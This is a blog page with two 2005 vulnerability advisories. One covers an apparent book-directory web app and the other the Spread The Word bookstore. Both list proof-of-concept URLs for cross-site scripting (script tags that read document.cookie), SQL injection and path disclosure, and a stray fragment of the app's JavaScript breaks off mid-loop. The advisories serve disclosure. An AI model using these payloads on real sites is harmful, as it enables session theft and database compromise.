http://[victim]/index.php?page=add_contents&isbn=083081423X
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&chapters=25

http://[victim]/index.php?page=add_contents&isbn=083081423X
&chapters=25%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

NICE ERROR !!


; function tallyup() { var count = 0; var book = 0; var part = 0; var section = 0; var chapter = 0; var appendix = 0; var main_prefix = ""; var section_prefix = ""; for ( i=0; i var persian = '' + value; var roman=""; var ronumdashes=""; var buffer=10-persian.length; while (buffer>0) {persian="0"+persian;buffer--} var units=new Array("","I","II","III","IV","V","VI","VII","VIII","IX"); var tens=new Array("","X","XX","XXX","XL","L","LX","LXX","LXXX","XC"); var hundreds=new Array("","C","CC","CCC","CD","D","DC","DCC","DCCC","CM"); var thousands=new Array("","M","MM","MMM","MV","V","VM","VMM","VMMM","MX"); var billionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes=billionsdashes[persian.substring(0,1)]; var hundredmillionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes+=hundredmillionsdashes[persian.substring(1,2)]; var tenmillionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes+=tenmillionsdashes[persian.substring(2,3)]; var millionsdashes=new Array("","_","__","___","_=","=","=_","=__","=___","_="); romandashes+=millionsdashes[persian.substring(3,4)]; var hundredthousandsdashes=new Array("","_","__","___","__","_","__","___","____","__"); romandashes+=hundredthousandsdashes[persian.substring(4,5)]; var tenthousandsdashes=new Array("","_","__","___","__","_","__","___","____","__"); romandashes+=tenthousandsdashes[persian.substring(5,6)]; var thousandsdashes=new Array("","","",""," _","_","_","_","_"," _"); romandashes+=thousandsdashes[persian.substring(6,7)]; roman=thousands[persian.substring(0,1)]; roman+=hundreds[persian.substring(1,2)]; roman+=tens[persian.substring(2,3)]; roman+=thousands[persian.substring(3,4)]; roman+=hundreds[persian.substring(4,5)]; roman+=tens[persian.substring(5,6)]; roman+=thousands[persian.substring(6,7)]; roman+=hundreds[persian.substring(7,8)]; roman+=tens[persian.substring(8,9)]; roman+=units[persian.substring(9,10)]; return roman; } function alphabetise(number) { return String.fromCharCode(64+number); } /// function submitconfirm() { var agree = document.getElementById('agree'); if ( !agree.checked ) { alert("You must indicate your agreement to the terms and conditions by checking the box provided."); return false; } return true; }


###################
add_contents.htm
###################


http://[victim]/add_contents.htm?isbn=083081423X
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/suggest_category.htm?node=Agriculture
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/contact.htm?user=admin
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/add_booklist.htm?node=Agriculture_and_Aqua
culture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


#########################
others.
#########################

http://[victim]/add_url.htm?node=
%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/search.htm?page=search&submit%5Bstring
%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29
%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author

http://[victim]/add_classification.htm?isbn=0830815961
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Gospels

http://[victim]/suggest_review.htm?node=Business_and_Economics
"><script>alert(document.cookie)</script>

############################
posible local fle inclusion
############################

http://[victim]/suggestions/"><
script>alert(document.cookie)</script> .htm

http://[victim]/directory/">%3Cscript%3
Ealert(document.cookie)%3C/script%3E.htm



################
path disclosure:
################

http://[victim]/search.htm?page=search&submit%5Bstring%
5D=&submit=Ok&submit%5Btype%5D=auth
or

http://[victim]/search.htm?page=search&submit%5
Bstring%5D=&submit%5Btype%5D=title

######################## €nd ########################

thnx to estrella to be my ligth
Thnx to icaro he is my Shadow !!!
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente

Spread The Word multiple XSS and SQL injections

Tuesday, May 24, 2005
####################################################
Spread The Word (comersus based bookstore ) multiple
script and variables XSS and SQL Injections vulnerabilities.
vendor url:http://www.stwm.com/opportunity.asp
advisore url:http://lostmon.blogspot.com/2005/05/
spread-word-multiple-xss-and-sql.html
vendor notified:yes exploit available: yes
BID:13733 and 13737
####################################################

Spread The Word (comersus based bookstore ) contains a flaw that
allows a remote cross site scripting attack.This flaw exists because
the application does not validate multiple variables upon submission
to multiple scripts.This could allow a user to create a specially
crafted URL that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server,
leading to a loss of integrity.


##############
versions:
##############

I can´t established what version are affected.

##############
solution:
##############

no solution was available at this time.

##############
timeline
##############

discovered: 17 oct 2004
vendor notify: 08 april 2005
vendor response: 11 april 2005
disclosure: 24 may 2005



####################
proof of concepts:
####################

Some files have diferent prefix like STW
ej: 'ShowContent.asp' in others stores are 'STWShowContent.asp'

#####################
BrowseCategories.asp
#####################

XSS,sql errors and path disclosure.


http://[target]/store/BrowseCategories.asp?Cat0=783&
Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible[XSS-here]

http://[target]/store/BrowseCategories.asp?Cat0=783
&Cat0Literal=Gifts&Cat1=839[XSS-here]&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783
&Cat0Literal=Gifts[XSS-here]&Cat1=839&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783[XSS-here]
&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783[SQL-INJECTION]
&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=
Gifts&Cat1=839[SQL-INJECTION]&Cat1Literal=Bible

Cat0literal can be books, videos,gifts,bibles,or other categories similars listed in the cart.

#############
search.asp
#############

XSS,sql errors and path disclosure.

http://[target]/store/Search.asp?SearchType=565
[SQL-INJECTION]&strSearch=lalala

http://[target]/store/Search.asp?InStock=[XSS-here]
&SearchType=783&strSearch=i&SearchCat1=-1&SearchCat2=
-1&PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=
783&strSearch=[XSS-here]&SearchCat1=-1&SearchCat2=
-1&PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=lol&SearchCat1=-1[XSS-here]&SearchCat2=-1
&PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=lol&SearchCat1=-1&SearchCat2=-1[XSS-here]&
PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=
[XSS-here]&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=
&PriceMax=[XSS-here]&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=1&SearchCat1=-1&SearchCat2=-1&PriceMin=
&PriceMax=&PublicationDate='

##################
AdvancedSearch.asp
##################

http://[target]/store/AdvancedSearch.asp?strSearch=
[XSS-CODE]&SearchType=-1&SearchCat1=-1&SearchCat2=
-1&Author=dd&PublicationDate=-1&PriceMin=1&PriceMax=
111111111&B1=Submit


##################
ViewItem.asp
##################

XSS,sql errors and path disclosure.

http://[target]/store/ViewItem.asp?ISBN=
0789906651[XSS-here]&Cat0=565

http://[target]/store/ViewItem.asp?ISBN=
0789906651&Cat0=565[XSS-here]

http://[target]/store/ViewItem.asp?ISBN=
0789906651[SQL-INJECTION]&Cat0=565

http://[target]/store/ViewItem.asp?ISBN=0789906651
&Cat0=565[SQL-INJECTION]



####################
STWShowContent.asp
###################
XSS ,sql errors and path disclosure.


http://[target]/store/STWShowContent.asp?
idRightPage=13032[XSS-CODE]

http://[target]/store/STWShowContent.asp?
idRightPage=13032[SQL-INJECTION]

http://[target]/store/STWShowContent.asp

###################
MySide.Asp
###################
XSS,sql errors and path disclosure.


http://[target]/store/MySide.Asp?Cat0=565
&Cat0Literal=Bibles[XSS-CODE]

http://[target]/store/MySide.Asp?Cat0=565
[SQL-INJECTION]&Cat0Literal=Bibles

#################
BrowseMain.asp
#################
XSS ,sql errors and path disclosure.

http://[target]/store/BrowseMain.asp?Cat0=565
[XSS-CODE]&Cat0Literal=Bibles&CurHigh=4

http://[target]/store/BrowseMain.asp?Cat0=565
&Cat0Literal=Bibles[XSS-CODE]&CurHigh=4

http://[target]/store/BrowseMain.asp?Cat0=565
[SQL-INJECTION]&Cat0Literal=Bibles&CurHigh=4

http://[target]/store/BrowseMain.asp?Cat0=783
&Cat0Literal=Gifts&CurHigh=3"><
script>alert(document.cookie)</script>

################
others
################
XSS

http://[target]/store/NewCustomer.asp?newemail=
zzzz@lalala.es&RedirectURL=[XSS-CODE]

http://[target]/store/Login.asp?RedirectURL=[XSS-code]

Also it´s posible to we can inject sql or XSS code in 'Cat0' variable
or 'Cat1' in all files where this variables are used.

Also it´s posible to we can inject XSS code in 'Cat0literal' variable
or 'Cat1literal' in all files where this variables are used.

################### End ################

thnx to estrella to be my ligth
Thnx to icaro he is my Shadow !!!
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...